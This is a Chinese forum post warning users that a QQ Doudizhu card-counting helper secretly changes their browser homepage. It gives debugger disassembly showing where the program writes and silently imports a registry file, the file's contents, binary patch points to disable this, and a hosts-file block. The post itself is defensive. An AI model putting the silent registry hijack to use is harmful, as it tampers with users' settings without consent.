用胜驴斗地主记牌器的朋友们小心了!!新版本会恶意修改首页,还会在桌面生成一个“网址之家”的快捷方式。 朋友用的一个记牌器,发现有点问题,要我修改下,就顺便发上来了,给需要的朋友! 胜驴斗地主记牌器是一款QQ斗地主游戏辅助软件,主要功能是自动记录玩家出牌历史,牌面情况,计算外面剩
余的牌,分析可能存在的炸弹等。是您玩斗地主游戏的得力助手。特点有:
◇独有的显示出牌历史记录功能,按顺序清晰的显示出各家出牌历史,在同类软件中绝无仅有
◇自动在线升级,当腾讯QQ斗地主游戏版本升级时,记版器会自动升级支持新版QQ斗地主游戏
◇软件体积小,占用内存少,界面美观大方
◇支持最新版QQ欢乐斗地主、角色版斗地主游戏,支持欢乐斗地主明牌
◇绝对绿色,软件不含第三方插件,无广告,不弹出任何窗口,也无任何使用限制
http://www.crsky.com/soft/15809.html也有的下载,建议取消下载 下面是关键地方看下吧。。 004954AB |. 84C0 TEST AL,AL
004954AD 75 1C JNZ SHORT unpacked.004954CB ; //这里就是在桌面上生成"网址之家"快捷方式 JNZ改成JMP就不会生成了
004954AF |. 8D55 E8 LEA EDX,DWORD PTR SS:[EBP-18]
004954B2 |. 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
004954B5 |. 8B80 18040000 MOV EAX,DWORD PTR DS:[EAX+418]
004954BB |. E8 A4D1FAFF CALL unpacked.00442664
004954C0 |. 8B55 E8 MOV EDX,DWORD PTR SS:[EBP-18]
004954C3 |. 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
004954C6 |. E8 5D52F8FF CALL unpacked.0041A728
004954CB |> 33C0 XOR EAX,EAX
---------------------------------------------------------------------------------------------------------
00495559 . BA CC594900 MOV EDX,unpacked.004959CC ; ASCII "C:\setting.reg"
0049555E . 8B08 MOV ECX,DWORD PTR DS:[EAX]
00495560 . FF51 74 CALL DWORD PTR DS:[ECX+74] ; //这里在c盘生成一个setting.reg 将这个CALL NOP掉
00495563 . 6A 05 PUSH 5
00495565 . 6A 00 PUSH 0
00495567 . 68 DC594900 PUSH unpacked.004959DC ; ASCII "/s C:\setting.reg"
0049556C . 68 F0594900 PUSH unpacked.004959F0 ; ASCII "regedit"
00495571 . 68 F8594900 PUSH unpacked.004959F8 ; ASCII "open"
00495576 . 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00495579 . E8 0639FBFF CALL unpacked.00448E84
0049557E . 50 PUSH EAX ; |hWnd
0049557F E8 F461F9FF CALL <JMP.&shell32.ShellExecuteA> //这里隐藏运行/s c:\setting.reg 将这个CALL NOP掉
00495584 . 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00495587 . 8B80 3C040000 MOV EAX,DWORD PTR DS:[EAX+43C]
0049558D . E8 CE34F7FF CALL unpacked.00408A60
00495592 . 8BD0 MOV EDX,EAX
00495594 . A1 748E4900 MOV EAX,DWORD PTR DS:[498E74]
00495599 . 8B00 MOV EAX,DWORD PTR DS:[EAX]
0049559B . E8 58C8FAFF CALL unpacked.00441DF8
004955A0 . 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
004955A3 . 8B80 40040000 MOV EAX,DWORD PTR DS:[EAX+440]
----------------------------------------------------------------------------------------------------------------------------------------
这就是setting.reg文件内容:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="
http://www.ttver.net/"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT]
"qtv.exe"=dword:00000000
---------------------------------------------------------------------------------------------------------------------------------------
就修改了这些,现在文件无壳比源程序稍微大点。加壳怕杀软会误报毒就不加了。 如果真的要使用这款软件,最好把hosts文件加一行 127.0.0.1 www.win2046.com hosts文件在C:\WINDOWS\system32\drivers\etc下。
微博帐号登录